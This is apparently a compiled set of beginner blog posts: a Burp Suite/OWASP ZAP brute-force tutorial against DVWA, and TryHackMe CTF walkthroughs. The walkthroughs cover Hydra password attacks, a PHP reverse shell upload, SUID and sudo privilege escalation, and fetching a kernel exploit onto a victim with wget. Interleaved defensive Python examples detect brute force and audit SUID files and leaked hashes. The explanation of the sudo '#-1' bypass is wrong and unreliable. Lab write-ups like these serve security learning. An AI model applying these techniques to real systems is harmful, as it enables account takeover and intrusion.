
Brute Force using Burp Suite and OWASP ZAP

Hello friends. Are you a beginner in cyber security? Are you passionate about it? If you are interested in learning how to brute force a website login page using tools like Burp Suite and OWASP ZAP, then you are on the right page and this article is exactly for you. Let's learn together.

What is Brute Force Attack?

Brute force is the simplest method by which an attacker gains access to a victim's login page or server: guessing the correct username and password by trying every combination of usernames and passwords. For example, suppose you have a padlock with a 3-digit combination pin. When you forget the pin, you try the possible combinations of numbers until the padlock opens.

As password complexity increases, attackers automate the brute force process against websites with the aid of sophisticated tools, word lists, dictionaries and so on. This may take days or weeks, but eventually the attacker will find a way into the victim's account. This is perhaps the main reason that security researchers, large companies and regulatory bodies now stress the importance of strong passwords and two-factor authentication (2FA), such as a code received via email, an OTP, or even a fingerprint.

What is Word list or Dictionary?

A word list or dictionary is a collection of potential passwords, commonly used for brute force attacks. A brute force attack driven by a dictionary or word list is sometimes referred to as a dictionary attack. It has been observed that attackers commonly publish the dictionary file on the internet after an attack so that other attackers can use it in future.

One of the popular word lists shipped with Kali Linux is called "rockyou", located in the /usr/share/wordlists directory. You can also generate your own word list with word list generating tools; for more information refer to https://github.com/topics/wordlist-generator

What is Burp Suite ?

Burp Suite is a collection of web application security testing tools developed by PortSwigger Web Security. It is a great tool that allows you to intercept the traffic between a client and a server. It comes in a free Community edition and in Pro and Enterprise editions. Although the Community edition is free, the Pro edition is recommended for a few additional features such as Burp Scanner.

For demo purposes, we use the Community edition.

How to Set Up Burp suite?

  • Download the Burp Suite installer for your platform (Windows, macOS, or Linux) from the PortSwigger.net website.
  • Follow the setup instructions by clicking the Next button.
  • When the installation is done, click the Finish button.
  • When you start Burp Suite, the only option available is a temporary project; click Next, keep the Burp Suite defaults as shown in the startup wizard, then click Start.

Configure Burp Suite Proxy Setting

At the top, click the "Proxy" tab, then select "Options" and make sure the port number is 8080.

Configure the Web browser – Firefox

In Firefox, open the menu and click "Options".

In the search box, type "Proxy Settings" and select the settings.

Select manual proxy configuration; by default the "HTTP proxy" is set to IP address 127.0.0.1 and "Port" 8080.

Delete anything that appears in the "No proxy" field.

Installing Burp’s CA certificate in Firefox

By default, when you browse an HTTPS website via Burp, the Proxy generates a TLS certificate for each host, signed by its own Certificate Authority (CA) certificate. This CA certificate is generated the first time Burp is run, and stored locally. To use Burp Proxy most effectively with HTTPS websites, you will need to install Burp’s CA certificate as a trusted root in your browser.

As a first step, export the CA certificate from Burp Suite.

Select "Certificate in DER format" and click Next.

Save the certificate in ".cer" format anywhere on the local machine. Remember the path, as we need to import "burp.cer" into the browser.

Now go to Firefox and select Options.

In the search box, search for "certificate".

Click "View Certificates".

In the Certificate Manager, select "Authorities" and click "Import".

Select the certificate from the location where you saved it earlier.

When you import the certificate, check the box "Trust this CA to identify websites" and click "OK".

Now you have imported the certificate. Close all dialog boxes and restart Firefox. You should now be able to visit any HTTPS URL without errors.

What is OWASP Zed Attack Proxy?

OWASP ZAP is an open source web application security tool widely used by beginners, developers and pen testers. The ZAP project is considered one of OWASP's flagship projects and is actively maintained by a group of security researchers across the world. It proxies HTTP traffic and allows you to inspect, modify and resend requests to test for security vulnerabilities. ZAP has many other features, such as a passive scanner, a fuzzer, spidering of web applications and automated scans, plus many more.

How to Set Up ZAP?

  • First download ZAP from https://www.zaproxy.org/download/. Choose the appropriate version for your OS.
  • Execute the installer. Note that ZAP requires Java 8+ in order to run; you must install Java 8+ separately for the Windows, Linux and Cross-Platform versions.
  • Once the installation is complete, launch ZAP and read the license terms. Click Agree if you accept the terms; ZAP will finish installing and then start automatically.

Configure ZAP Proxy Setting

When you first start ZAP, you will be asked whether you want to persist the ZAP session. By default, ZAP sessions are always recorded to disk in an HSQLDB database with a default name and location. If you do not persist the session, those files are deleted when you exit ZAP. For now, select "No, I do not want to persist this session at this moment in time", then click Start. The ZAP session will not be persisted for now.

Go to "Tools" and select "Options".

Select "Local Proxies" and verify that the address is set to localhost or 127.0.0.1 and the port to 8082. When you configure the browser, you need to use the same port number.

Configure the Proxy Setting in Web browser- Firefox

Go to "Options" in Firefox.

In the search box, type "proxy".

Select manual proxy configuration; by default the "HTTP proxy" is set to IP address 127.0.0.1 and "Port" 8080. The port must match the port number in the ZAP proxy setting. Here the ZAP proxy port number is 8082.

Delete anything that appears in the "No proxy" field.

Installing ZAP’s CA certificate in Firefox

As a first step, export the CA certificate from ZAP.

Select "Dynamic SSL certificate" and click "Generate" to create a new certificate.

Save the certificate in ".cer" format anywhere on the local machine. Remember the path, as we need to import "owasp_zap_root_ca.cer" into the browser.

Go to Options in Firefox.

Click Options and search for "certificate".

Click "View Certificates".

In the Certificate Manager, select "Authorities" and click "Import".

Import the certificate from the location where you saved it.

Open the certificate, enable "Trust this CA to identify websites", then click OK.

Now you have imported the certificate. Close all dialog boxes and restart Firefox. You should now be able to visit any HTTPS URL without errors.

Brute Force Attack Using Burp Suite

Now it is time to brute force a web application using Burp Suite and OWASP ZAP. Brute force only web applications you are authorized to test. First of all, never run these tools against any live application or machine without permission. For testing purposes you can use applications like DVWA, bWAPP, etc.

Today our target machine is DVWA. Damn Vulnerable Web Application (DVWA) is a deliberately vulnerable application meant for security professionals to test their skills and tools in a legal environment.

To install DVWA, read the instructions at https://github.com/ethicalhack3r/DVWA.

Now open DVWA and log into it using its default username and password. Once you have logged in, click on "Brute Force". Also make sure that the security level is set to low or medium.

When you click on Brute Force, it asks for a username and password to log in. Now suppose you don't know the password for the account.

Before logging in, make sure that in Burp Suite's "Intercept" tab "Intercept is on". To start the brute force attack, enter a random password and click Login.

In Burp Suite, the request has been intercepted.

Now send the intercepted request to Intruder by right-clicking or clicking the Action button.

Now go to the Positions tab and clear the pre-set payload positions using the "Clear" button on the right of the request editor. Add the "password" parameter value as a position by highlighting it and using the "Add" button.

From the "Attack type" drop-down menu, select "Sniper". If there is a single payload position, the attack type should be "Sniper"; if there is more than one, the attack type should be "Cluster bomb".

Now go to the Payloads tab, select "1" from the payload set and set the payload type to "Simple list". In the payload options, enter some possible passwords. You can do this manually or use a custom or pre-set payload list. Click the "Start attack" button.

In the "Intruder attack" window, you can sort the results by clicking a column header; here the useful ones are Length and Status. You can also inspect each response. Now you have the password and you can try it in the DVWA application.

To confirm that the brute force attack has been successful, use the recovered password on the DVWA login page.

Username & Password Brute Force Using Burp Suite Cluster Bomb Attack

In the scenario above, we saw how Burp Suite guesses the password for a known username using the Sniper attack. If you know neither the username nor the password, Burp Suite has another option called the Cluster bomb attack. Using this option, you can brute force the username and password together. Let's see how.

Enter a random username and password on the DVWA login page.

Intercept the request with Burp Suite and send it to "Intruder" by clicking the Action button.

Now go to Intruder's Positions tab and clear the pre-set payload positions using the "Clear" button on the right of the request editor. Add the "username" and "password" parameter values as positions by highlighting them and using the "Add" button.

From the "Attack type" drop-down menu, select "Cluster bomb".

Now go to the Payloads tab, select "1" from the payload set and set the payload type to "Simple list". In the payload options, enter some possible usernames. Similarly, select "2" from the payload set, set the payload type to "Simple list", and in the payload options enter some possible passwords. You can do this manually or use a custom or pre-set payload list. Click the "Start attack" button.

In the "Intruder attack" window, you can sort the results by clicking a column header; here the useful ones are Length and Status. You can also inspect each response. Now you have the username and password and you can verify them in the DVWA application.

To confirm that the brute force attack has been successful, use the recovered username and password on the DVWA login page.

Brute force attack using OWASP ZAP

Before carrying out the brute force attack, make sure the proxy settings are correct. Unlike Burp Suite, ZAP intercepts all traffic by default. When you successfully connect to the application from the browser, you will see more lines appear in the Sites and History panels.

To start the brute force attack, enter a random password and click Login.

See the intercepted request in ZAP.

Select the URL in "Sites" and click "New Fuzzer" to add payloads.

Add the "username" parameter value as a position by highlighting it and using the "Add" button.

After positioning the parameter, you can add payloads by clicking the Add button.

Here, enter the possible usernames and select "Strings". If you are using a word list, select the respective "Type" from the drop-down menu. Click Add to go to the next step.

Similarly, select the position of the password and set the parameter value for the second set of payloads. Enter possible passwords and select the type "Strings" from the drop-down menu. Click Add to proceed to the next step.

Now you have configured the payloads for username and password. It is time to click "Start Fuzzer".

In the "Fuzzer" window, you can sort the results by clicking a column header; here the useful ones are Size Resp. Body, RTT and Reason. You can also verify by comparing the responses. Now you have the username and password and you can verify them in the DVWA application.

To confirm that the brute force attack has been successful, use the recovered username and password on the DVWA login page.
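Both the Burp Intruder and the ZAP Fuzzer runs above leave the same footprint on the server side: a burst of hits on the login page from one address, where every wrong guess gets an identical response and the correct one differs in size. The following added example (not code from Burp, ZAP or DVWA) detects that pattern from Apache-style access log lines; the log lines, the DVWA path and the thresholds are constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Apache combined log prefix: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/dvwa/vulnerabilities/brute/"  # assumed path of DVWA's Brute Force page

# Constructed sample log: 10.0.0.5 fires seven guesses in eight seconds; every
# wrong guess gets the same 4821-byte page and the one correct guess differs.
# 10.0.0.9 is a normal user who mistyped once.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jul/2021:10:00:00 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess1&Login=Login HTTP/1.1" 200 4821
10.0.0.5 - - [20/Jul/2021:10:00:01 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess2&Login=Login HTTP/1.1" 200 4821
10.0.0.9 - - [20/Jul/2021:10:00:02 +0000] "GET /dvwa/vulnerabilities/brute/?username=gordonb&password=guess1&Login=Login HTTP/1.1" 200 4821
10.0.0.5 - - [20/Jul/2021:10:00:02 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess3&Login=Login HTTP/1.1" 200 4821
10.0.0.5 - - [20/Jul/2021:10:00:03 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess4&Login=Login HTTP/1.1" 200 4821
10.0.0.5 - - [20/Jul/2021:10:00:05 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess5&Login=Login HTTP/1.1" 200 4821
10.0.0.5 - - [20/Jul/2021:10:00:06 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess6&Login=Login HTTP/1.1" 200 4934
10.0.0.5 - - [20/Jul/2021:10:00:08 +0000] "GET /dvwa/vulnerabilities/brute/?username=admin&password=guess7&Login=Login HTTP/1.1" 200 4821
10.0.0.9 - - [20/Jul/2021:10:00:40 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1502
"""


def parse_log(text):
    """Parse access log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], TS_FMT),
            "path": m["path"].split("?", 1)[0],  # drop the query string
            "status": int(m["status"]),
            "size": 0 if m["size"] == "-" else int(m["size"]),
        })
    return events


def detect_bruteforce(events, login_path=LOGIN_PATH,
                      window=timedelta(seconds=60), threshold=5):
    """
    Flag source IPs that hit the login page at least `threshold` times inside
    any `window`. For a flagged IP, the (status, size) pair seen most often is
    the 'wrong password' baseline; any other response is an outlier, which is
    the same signal an analyst gets by sorting Intruder results by Length.
    """
    per_ip = defaultdict(list)
    for e in events:
        if e["path"] == login_path:
            per_ip[e["ip"]].append(e)

    report = {}
    for ip, hits in per_ip.items():
        hits.sort(key=lambda e: e["ts"])
        peak, start = 0, 0  # sliding window over the sorted timestamps
        for end in range(len(hits)):
            while hits[end]["ts"] - hits[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        baseline = Counter((h["status"], h["size"]) for h in hits).most_common(1)[0][0]
        outliers = [h for h in hits if (h["status"], h["size"]) != baseline]
        report[ip] = {
            "attempts": len(hits),
            "peak_in_window": peak,
            "baseline_response": baseline,
            "outliers": [(h["ts"].isoformat(), h["status"], h["size"]) for h in outliers],
        }
    return report


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(ip, info)
```

The outlier list is a lead, not proof: a successful guess and a transient error page both differ from the baseline, so the flagged attempts still need to be checked against the application's own authentication log.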

Congratulations! You have taken a step forward towards brute forcing web applications using OWASP ZAP and Burp Suite. For a security career or bug bounty programs, one should be well versed in both Burp Suite and OWASP ZAP. I prefer ZAP over Burp Suite because, when I brute force with a word list, the Fuzzer in ZAP is far faster than Cluster bomb in Burp Suite.

Happy Learning!

Mr. Robot -TryHackMe

Dear hacker friends, hope you are doing well. Welcome to the Mr. Robot CTF challenge. In this challenge, we have to find 3 keys on the box. To access the box, visit https://tryhackme.com/room/mrrobot

#Enumeration

Let's begin with an Nmap scan to discover services and ports, using the following command:

nmap -A <IP Address>

As a result of the scan, we can see common services running on the expected ports: ssh (22), http (80) and https (443).

The target machine has a web server running, so let's see what is available on port 80.

The website gives a few options, all of which are references to the TV show Mr. Robot.

Let's run a gobuster scan to find more paths in the web directory.

The results highlighted in red are worth checking. Let's check them one by one.

The website is hosted on WordPress, which we know is vulnerable to a lot of attacks. We can also run WPScan to check for more options to exploit.

There is a robots.txt file:

robots.txt reveals some dictionary files; let's check the path.

I found a file fsociety.dic and downloaded it to my local machine. Similarly I checked key-1-of-3.txt. We've got our first key for the first challenge.

We have a WP login page and a dictionary file. Now we can perform a brute force, but first we need to sort the dictionary file, as it is very large and contains duplicate entries.

After running the sort command, the file has been reduced to 11451 lines.

Let's brute force the username against wp-login with Hydra. This is the Hydra command:

hydra -vV -L new.dic -p test <IP address> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

We've identified "elliot" as a username.

Similarly, let's attempt to find the password for this username. This is the command:

hydra -vV -P new.dic -l elliot <IP address> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=The password'

Here we go, we have credentials. Now we can exploit this, aiming for some kind of reverse shell. The easy method is uploading a PHP reverse shell file.
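The two Hydra commands above only work because the login page answers "Invalid username" for an unknown user and "The password ..." for a known one, so the error text alone confirms which usernames exist. The added example below (not code from WordPress or Hydra; the user store, messages and work factor are constructed) shows that leaky behaviour next to a hardened handler, and a self-check that applies Hydra's F= rule to either one.

```python
import hashlib
import hmac
import os

ITERATIONS = 50_000  # assumed PBKDF2 work factor for the constructed user store


def derive(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: username -> (salt, derived key). "elliot" is the only account.
_SALT = os.urandom(16)
USERS = {"elliot": (_SALT, derive("correct-horse-battery", _SALT))}
# Dummy record so that unknown usernames cost the same hashing work as real ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY = (_DUMMY_SALT, derive("dummy-password", _DUMMY_SALT))


def login_leaky(username, password):
    """WordPress-style behaviour: the error text says which half was wrong."""
    if username not in USERS:
        return "Invalid username"
    salt, key = USERS[username]
    if not hmac.compare_digest(derive(password, salt), key):
        return "The password you entered for the username %s is incorrect" % username
    return "Welcome"


GENERIC_FAILURE = "Invalid username or password"


def login_hardened(username, password):
    """Same outcome for both failure causes: one message, same amount of work."""
    salt, key = USERS.get(username, _DUMMY)
    ok = hmac.compare_digest(derive(password, salt), key)
    if ok and username in USERS:
        return "Welcome"
    return GENERIC_FAILURE


def confirmed_by_oracle(login, candidates, failure_string):
    """
    Apply Hydra's F= rule: a response that does NOT contain `failure_string`
    counts as a hit. Run with a deliberately wrong password, any username that
    still 'hits' has been confirmed to exist by the error message alone.
    Point this at your own login handler to check that it does not leak.
    """
    return [u for u in candidates
            if failure_string not in login(u, "definitely-wrong")]


if __name__ == "__main__":
    names = ["admin", "elliot", "root"]
    print("leaky handler confirms:", confirmed_by_oracle(login_leaky, names, "Invalid username"))
    print("hardened handler confirms:", confirmed_by_oracle(login_hardened, names, GENERIC_FAILURE))
```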

#Exploitation

If you are using Kali Linux, web shells are available by default in the directory /usr/share/webshells.

Copy a PHP reverse shell to your current directory; the command is:

cp /usr/share/webshells/php/php-reverse-shell.php .

Edit the copied file and set the IP address and port number on which you will receive the reverse shell.

I uploaded the PHP file in the theme editor under Appearance. I also started a netcat listener on port 4444.

After uploading the PHP reverse shell, I got a reverse shell on port 4444, signed in as daemon.

I moved to the /home directory to see who is on the system. There is a user called robot with a couple of files. I tried to open the text file "key-2-of-3.txt" but was unable to see its contents; however, I was able to see what was inside "password.raw-md5".

When I googled the hash in password.raw-md5, it revealed the password. Now let us try to use the password to gain the privileges of another user. Since we only have a limited shell, let's use a Python TTY shell.

Wow, we've got access as user robot. First we switched to user robot, then entered the password, and we got user robot access. We read the text file "key-2-of-3.txt" and got the second key.

#Privilege Escalation

In order to gain root access, we need to escalate privileges from the current user to the root user; only then will we be able to access the root flag, the 3rd key.

Let's check for files with the SUID permission. This is one way to run a command as another user via a program installed on the Linux machine.

Command to list all SUID binaries owned by root on the system:

find / -user root -perm -4000 -print 2>/dev/null

We can identify nmap as a non-native SUID binary. Let's get an interactive nmap shell with the command nmap --interactive. To elevate privileges, run !sh.
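Spotting nmap in that find output relied on knowing which SUID-root programs are normal for the distribution. The added example below (not code from the walkthrough) turns that into a repeatable audit: it scans for SUID files the way the find command does, then compares the result against a baseline so that any non-native entry stands out. The baseline subset and the sample entries are constructed assumptions; build the real baseline from a clean install of the same release.

```python
import os
import stat
import tempfile

# Assumed baseline (a subset): SUID-root programs normally present on a
# Debian-like host. Adapt it to the release you are auditing.
BASELINE_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/umount",
}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems, not worth walking


def scan_suid(root="/", owner_uid=0):
    """Equivalent of `find / -user root -perm -4000`: return (path, mode, uid)
    for regular files that have the SUID bit set and are owned by `owner_uid`."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                found.append((path, st.st_mode, st.st_uid))
    return found


def classify_suid(entries, baseline=BASELINE_SUID):
    """Split SUID entries into those in the baseline and those that are not.
    Anything 'unexpected' (nmap in the walkthrough) deserves a look: was it
    made SUID on purpose, and can it hand a shell to the caller?"""
    expected, unexpected = [], []
    for path, _mode, _uid in entries:
        (expected if path in baseline else unexpected).append(path)
    return {"expected": sorted(expected), "unexpected": sorted(unexpected)}


# Constructed sample mirroring the walkthrough's finding.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/sudo", 0o104755, 0),
    ("/usr/local/bin/nmap", 0o104755, 0),  # not in the baseline
]


def scan_demo_dir():
    """Create a throwaway directory tree with one SUID file and scan it, so the
    scanner can be exercised without root. Returns (suid_path, scan_result);
    the result is empty if the filesystem refused to set the SUID bit."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    os.mkdir(os.path.join(root, "sub"))
    plain = os.path.join(root, "plain")
    suid = os.path.join(root, "sub", "suidbin")
    for p in (plain, suid):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)
    return suid, scan_suid(root, owner_uid=os.getuid())


if __name__ == "__main__":
    print(classify_suid(SAMPLE_ENTRIES))
    print(classify_suid(scan_suid()))  # live audit of this host; slow and needs read access
```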

The next step is to find the root flag. I switched the present working directory to the root directory using cd, listed all the files using ls, and read the flag using cat.

Conclusion

We've successfully completed the Mr. Robot CTF challenge. I believe you enjoyed the walkthrough. If you liked it, please share it on Twitter, Reddit or LinkedIn.

Agent Sudo CTF Challenge

Dear hacker friends! Today we are going to walk through a TryHackMe room called "Agent Sudo". The room is listed as easy and covers a lot of different tools and aspects of security, which makes it a great room for beginners to complete.

First things first! I hope you have deployed your machine and connected to the TryHackMe VPN.

So let's begin.

#Enumeration

Let's enumerate the machine and gather all the important information using Nmap.

This machine has 3 open ports.

Since port 80 is open, let us visit the web page. I looked at the source code and didn't find anything.

From the web page we get a clue that we can access a hidden page by changing our User-Agent.

To change the agent code and see the response, let us start Burp Suite. I opened Burp Suite and intercepted the request. If you look closely, every agent's name is a single letter. In the image above, I had already changed the User-Agent to B and sent it to the server; nothing came back. So I turned Intercept on in Burp Suite and sent the request to Intruder, changing the User-Agent section to a single letter, like the letter we got for Agent R.

There, we set our target and specify the position we want to change by enclosing the section in '§§'.

We then head to the Payloads tab and specify a word list, which in our case is just a list of single letters. Then we hit Start attack:

For every request we get Status 200, but for User-Agent: C we get Status 302 (Redirect):

As we can see, the response redirects us to "agent_C_attention.php". Let us visit that web page. There, we see the following message:

#Hash cracking and brute-force

Since we now have a username and know that our user has a weak password, we can try to brute force the login. Let us brute force the FTP password using Hydra and rockyou.txt:

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.94.89 ftp

After some time, Hydra returns with an answer:
Username: chris
Password: crystal

Let us log into the FTP server and see what content it has:

We see 3 files; let us download them to our machine using the following commands:

We can use the cat or nano command to see the content of the text file; we got this message.

The next two files are image files. The first thing that came to mind was running steghide and exiftool on them. However, this gave me nothing. I tried running strings on them, and cutie.png seemed to have a text file hidden in it. I decided to use binwalk on it, a tool for finding embedded files and executables inside images.

This showed that a zip file was hidden in the image:

This gave us a zip file, 8702.zip, which was password protected. Using John, this was crackable:

We use zip2john 8702.zip > output.txt to convert the zip file into a hash that John can read, and then go for the hash with john.

  • zip2john 8702.zip > output.txt
  • john output.txt

Now that I have found the zip password "alien", I can unzip it and view the To_agentR.txt file.

'QXJlYTUx' looks like a base64 string; let's try to decode it.

Now, let us try steghide on the other image with our newly found password to extract the hidden data:

I viewed the content of the extracted hidden file "message.txt" using the "cat" command.

In this message, we find the name of the other agent, james! We also find his password, hackerrules!

#Capture the user flag

Now that we have the username and password, let's try SSH; the command is "ssh james@IP".

When we log in to the system, we find the user flag in our current directory.

There was an image "Alien_autospy.jpg". I downloaded the image to my machine with scp.

Doing a Google image search, finding the name was simple: "Roswell Alien Autopsy".

#Privilege escalation

I checked whether there are any programs that I could run as another user without providing their password, using "sudo -l".

It looks like we can run /bin/bash as any user except root. I did a quick Google search and found a security bypass vulnerability in sudo versions < 1.8.28.

Any user ID equal to 0 is considered the root user (the symbolic form for root is #). So the way I think of "#-1" is like 0 - 1 = 0: the machine treats -1 as the root user.

Now that we have access as the root user, let's list the contents of the current directory using "ls"; we find only the user flag. To find the root flag we switched to the root directory and found it there. Using the cat command we read the root flag. Hooray!

Conclusion

I believe you enjoyed this room. We've learned a lot of different tools and gained a better understanding of them. All in all, I believe this is a great room for beginners. I would like to thank TryHackMe for making this box free (without a subscription) and the author of the box, DesKel.

Pickle Rick -CTF Challenge @TryHackMe

Dear hackers! Good to see you again. Another day, another challenge! Today we are going to walk through another simple CTF challenge. Click HERE to be redirected to the challenge.

Deploy the machine, and let's start with our initial Nmap scan.

Port Scanning

The Nmap scan shows HTTP and SSH services running on ports 80 and 22.

Let's move on to the website running on port 80.

We've got a web page with a message from Rick to Morty requesting help. He needs to find the three ingredients (our flags); other than that, there is no useful information.

If we view the page source, there is a comment revealing a username.

Now we have a username, but to log in we need a password, so we need to do more enumeration. I used gobuster and found the assets folder and robots.txt.

The assets directory has the GIF, CSS and JS files used by the website; nothing interesting there. Checking robots.txt, there is a single entry/word. This could be the password.

Now that we have a username and password, I tried to connect to the server via SSH, but permission was denied. Let's move on to Nikto for more enumeration.

Running Nikto, we see that there is a login.php file, which is interesting. Let us try this login page in the web browser.

Now try the login with the credentials:

Username: R1ckRul3s and Password: Wubbalubbadubdub

Vulnerable WebApp

On the front page of the app, it seems we have a way to execute commands. Let's test it to see where we are:

When I executed the command "ls", I found a text file.

To view the content of the file I executed the "cat" command, and we got the response "command disabled".

So I used the "less" command instead of cat and got our first flag, i.e. "mr. meeseek hair".

When we ran "less" against "clue.txt" we got a clue for the second ingredient.

For the second flag I used "less /home/rick/'second ingredients'".

We've got the second flag, "1 jerry tear". Now we have to find the third flag. Let's see the sudo permissions for this user by executing "sudo -l"; we can see that there are no restrictions and the user can run any command with sudo.

We can execute ANY command on this box WITHOUT a password (ALL NOPASSWD: ALL). This is surely NOT good security! Let's use sudo with less on the root folder and see what we can find.

The command is: sudo less /root/3rd.txt

And we got the 3rd and final ingredient: fleeb juice

Conclusion

We've successfully completed the Pickle Rick CTF challenge. I would like to thank TryHackMe for hosting such an amazing CTF challenge. Keep it up! Once again, I hope you enjoyed the walkthrough. See you soon; till then, happy hacking!

Fowsniff CTF- Walkthrough

Introduction

Dear hackers! Today I am going to walk through another boot2root challenge known as Fowsniff. This boot2root machine is brilliant for new starters. You will have to enumerate the machine by finding open ports, do some online research (it's amazing how much information Google can find for you), decode hashes, brute force a POP3 login and much more.

You can access this machine from this url: https://tryhackme.com/room/ctf

#Scanning

Let's get started with an nmap scan to discover open ports and services.

The nmap output shows that there are 4 open ports: 22 (SSH), 80 (HTTP), 110 (POP3) and 143 (IMAP).

We find that an HTTP service is running on port 80, so let us look at the web server.

I didn't find any useful information on the web page. I used gobuster, but didn't find anything either.

So I googled "fowsniff corp" and found a password leak in a Pastebin link.

We'll save these passwords to a file named fowsniff.txt.

Then run a simple sed command to extract the hashed passwords (everything after the ‘:’) into a file named hashes.txt:

The passwords are MD5 hashes. These can be easily decoded using a site such as Hashes.com: just copy and paste the hashes, complete the captcha and hit submit:

We've managed to crack 8 out of 9 hashed passwords. Good job!
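The sed step and the Hashes.com lookup above work because the leak stores unsalted MD5: every candidate password maps to one fixed digest, so a single table of hashed candidates checks all accounts at once. The following added example (not code from the walkthrough; the leak lines, addresses and candidate list are constructed, and the real paste is not reproduced) parses a 'user:hash' dump, audits which accounts use a candidate password, and contrasts that with per-user salting.

```python
import hashlib
import re

MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed stand-in for the leaked 'user:hash' dump (NOT the real paste).
# The first two digests are MD5 of well-known weak passwords; the last one is
# a placeholder digest that no candidate will match.
LEAK = """\
# fowsniff corp credential dump (constructed sample)
alice@example-corp.test:5f4dcc3b5aa765d61d8327deb882cf99
bob@example-corp.test:E10ADC3949BA59ABBE56E057F20F883E
carol@example-corp.test:not-a-hash-at-all
dave@example-corp.test:0123456789abcdef0123456789abcdef
"""

# Constructed candidate list standing in for a word list such as rockyou.txt.
CANDIDATES = ["password", "123456", "letmein", "scoobydoo"]


def parse_leak(text):
    """Split 'user:hash' lines into (user, hash); this is what the sed step
    does when it keeps everything after the ':'. Comments and blanks are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, _, digest = line.partition(":")
        records.append((user.strip(), digest.strip().lower()))
    return records


def md5_hashes(records):
    """Keep only values shaped like MD5 (32 hex characters)."""
    return [h for _user, h in records if MD5_RE.match(h)]


def audit_unsalted_md5(records, candidates):
    """Hash each candidate once and look it up for every account. With no
    salt, one table of len(candidates) digests serves all users at once,
    which is why such leaks are matched in seconds. Returns user -> password."""
    table = {hashlib.md5(c.encode()).hexdigest(): c for c in candidates}
    return {user: table[h] for user, h in records if h in table}


def salted_digest(password, salt):
    """Contrast: with a per-user salt the same password yields a different
    digest for each user, so a shared lookup table no longer applies.
    Plain sha256 is used only to illustrate; a slow KDF belongs in production."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


if __name__ == "__main__":
    records = parse_leak(LEAK)
    print(len(md5_hashes(records)), "MD5-shaped hashes out of", len(records), "records")
    print("accounts using a candidate password:", audit_unsalted_md5(records, CANDIDATES))
    print(salted_digest("password", b"salt-a") == salted_digest("password", b"salt-b"))
```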

The user seina with password scoobydoo2 still has their account active. We can connect to the POP3 server on port 110 with netcat and use these POP3 commands:

Let's check for any sensitive messages with list and retrieve them with retr <idNumber>.

retr 1 reveals a temporary password for SSH, S1ck3nBluff+secureshell. This is important, though we can assume that seina has already changed it. Let's inspect the second message for a potential username.

retr 2 reveals a message from baksteen, who says they will read the message later, indicating that the temporary password should still be the one for their account.

We know that SSH is open, so let's try to log in as baksteen using the temporary password: ssh baksteen@10.10.198.32 -p22

And we have a low privilege shell. To get the root flag, we must become root on this machine. Let's proceed to the next step.

#Root Privilege Escalation

Our user baksteen doesn't have sudo permissions on the machine.

uname -a reveals that this kernel is 4.4.0 on Ubuntu 16.04, a very outdated machine. Searching the kernel version with searchsploit linux kernel 4.4.0 reveals an exploit from Exploit-DB.

We will have to compile this C code with gcc; there is no gcc installed on the victim, so we compile on the attacker machine. I downloaded the exploit and compiled it with gcc output.c.

After the compilation completes on our machine, I transfer the exploit to the victim machine using Python's SimpleHTTPServer. On the victim's machine I use wget.

After the exploit is downloaded, I give it execute permission using chmod +x output.c.1 and run the exploit with ./output.c.1, which spawns a root shell on the victim.

Now we have a root shell, and by changing into the root directory we get the flag!

Conclusion

I believe you enjoyed cracking the Fowsniff CTF box and learned something new today. I would like to thank TryHackMe for making this box free (without a subscription) and the author of the box, ben.

Hack Anthem on TryHackMe

Today, we are going to solve the TryHackMe Anthem CTF room. This is another beginner level box. We need to complete all the tasks on TryHackMe. I will explain each and every step required to crack the box.

Let’s get started!

Make sure you are connected to the TryHackMe VPN.

Then deploy the machine on TryHackMe.

Once the machine is deployed, check the connection to the target machine by pinging its IP.

Task 1: Website Analysis

The first step is to start with a basic Nmap scan.

